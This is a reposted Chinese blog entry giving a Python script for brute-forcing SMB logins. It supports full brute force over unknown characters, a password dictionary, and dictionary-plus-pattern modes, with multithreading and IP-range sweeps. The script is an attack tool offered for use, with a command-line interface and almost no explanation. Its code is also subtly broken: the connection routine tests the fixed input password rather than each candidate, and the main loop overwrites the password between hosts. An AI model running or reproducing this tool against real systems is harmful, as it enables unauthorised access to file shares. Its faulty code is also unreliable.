smb爆破/脚本
作者:互联网
import argparse import json import string import threading import time from decimal import Decimal from smb.SMBConnection import SMBConnection
password.json位置 https://www.cnblogs.com/hudieren/p/15604059.html password_rule.json位置 https://www.cnblogs.com/hudieren/p/15604066.html
class SmbScan: classify_list = { '1': '暴力破解', '2': '字典', '3': '字典+规则集', } def __init__(self, classify, host, port, username, password, timeout=0): """ :param classify: 种类(暴力破解,字典,字典+规则集) :param host: 地址(eg:192.168.100.115) :param port: 端口 :param username: 用户名 :param password: 部分密码(eg:1、`1qaz??` 2、`???`)[问号为不知道的密码,密码可能几位写几位问号] :param new_password: 最终正确密码 :param password_name: 常用密码文件路径 :param password_list: 可能密码列表 :param max_threads_number: 最大线程数 :param max_threads: 限制线程的最大数量 """ self.classify = classify self.host = host self.port = port self.username = username self.password = password self.timeout = timeout self.new_password = None self.password_name = 'password.json' self.password_list = self.get_password() self.max_threads_number = 6 self.max_threads = threading.Semaphore(self.max_threads_number) # 限制线程的最大数量为4个 def __violence(self, charsetString, password, length, data=None): """ 暴力破解 :param charsetString: 字符集 :param password: 密码 :param length: `?`共有多少个 :param data: 最终返回的结果 :return: """ if data is None: data = [] new_data = [] if len(data) == 0: new_data = [password.replace('?', i, 1) for i in charsetString] else: for i in data: for j in charsetString: new_data.append(i.replace('?', j, 1)) length -= 1 if length == 0: return new_data else: return self.__violence(charsetString, password, length, new_data) def __gather(self): """ 密码集合 :return: """ with open(self.password_name, 'r', encoding='utf-8') as r: data = json.loads(r.read()) return data def get_password(self): """ 获取可能的密码 :return: 可能的密码列表 """ password_list = [] charsetString = string.digits + string.ascii_letters + string.punctuation length = self.password.count('?') if self.classify == '1': if length > 0: password_list = self.__violence(charsetString, self.password, length) else: password_list.append(self.password) elif self.classify == '2': password_list = self.__gather() elif self.classify == '3': data = self.__gather() pwd_list = self.password.split('?') data = [d for d in data if len(d) == len(self.password)] password_list = [] for d in data: for pwd in pwd_list: if pwd not in d: break else: password_list.append(d) return password_list def connect(self, password): with self.max_threads: samba = SMBConnection(self.username, self.password, '', '', use_ntlm_v2=True) samba.connect(self.host, self.port, timeout=10) status = samba.auth_result samba.close() if status: self.new_password = password print('密码正确:{}'.format(password)) else: print('密码错误:{}'.format(password)) time.sleep(self.timeout) def run(self): password_threads = [] for password in self.password_list: print(password) thread = threading.Thread(target=self.connect, args=(password,)) password_threads.append(thread) for thread in password_threads: if self.new_password: break else: thread.start() for thread in password_threads: if self.new_password: break else: thread.join() return self.new_password def opt(): parser = argparse.ArgumentParser(description='命令行中传入命令') parser.add_argument('-choice', required=True, help='<1:暴力破解;2:字典;3:字典+规则集>') parser.add_argument('-host', required=True, help='<host(主机)>') parser.add_argument('-port', type=int, help='<port(端口)>', default=445) parser.add_argument('-username', required=True, help='<username(用户名)>') parser.add_argument('-password', required=True, help='<password(密码)>') parser.add_argument('-timeout', type=int, help='<timeout(间隔时间)>', default=0) return parser.parse_args() def get_host(host): host_list = [] if '-' in host: h = host.split('-') left_host = h[0] left_host_list = left_host.split('.') right_host = h[1] right_host_list = right_host.split('.') for i in range(int(left_host_list[-1]), int(right_host_list[-1]) + 1): d = left_host_list[:3] + [str(i)] host_list.append('.'.join(d)) elif '*' in host: rule = { '0': {'m': 1, 'n': 255 + 1}, '1': {'m': 0, 'n': 99 + 1}, '2': {'m': 0, 'n': 9 + 1}, } h = host.split('.') r = h[-1].split('*')[0] for i in range(rule['{}'.format(len(r))]['m'], rule['{}'.format(len(r))]['n']): d = h[:3] + ['{}{}'.format(r, i)] host_list.append('.'.join(d)) else: host_list.append(host) return host_list def main(flag=False, **kwargs): start_time = Decimal(time.time()).quantize(Decimal("0.00")) if flag: classify = kwargs.get('classify') host = kwargs.get('host') port = kwargs.get('port') username = kwargs.get('username') password = kwargs.get('password') timeout = kwargs.get('timeout') if not timeout: timeout = 0 host_list = get_host(host) else: args = opt() classify = args.choice port = args.port p = (445, 139) username = args.username password = args.password timeout = args.timeout host_list = get_host(args.host) pwd = [] for host in host_list: password = SmbScan(classify, host, port, username, password, timeout=timeout).run() d = { 'host': host, 'port': port, 'username': username, 'password': password, } pwd.append(d) end_time = Decimal(time.time()).quantize(Decimal("0.00")) print('结果为:\n{},\n用时:{}s'.format(pwd, end_time - start_time)) return {'result': pwd, 'hold_time': '{}s'.format(end_time - start_time)} if __name__ == '__main__': main()
标签:脚本,爆破,self,list,param,host,password,data,smb 来源: https://www.cnblogs.com/hudieren/p/15604030.html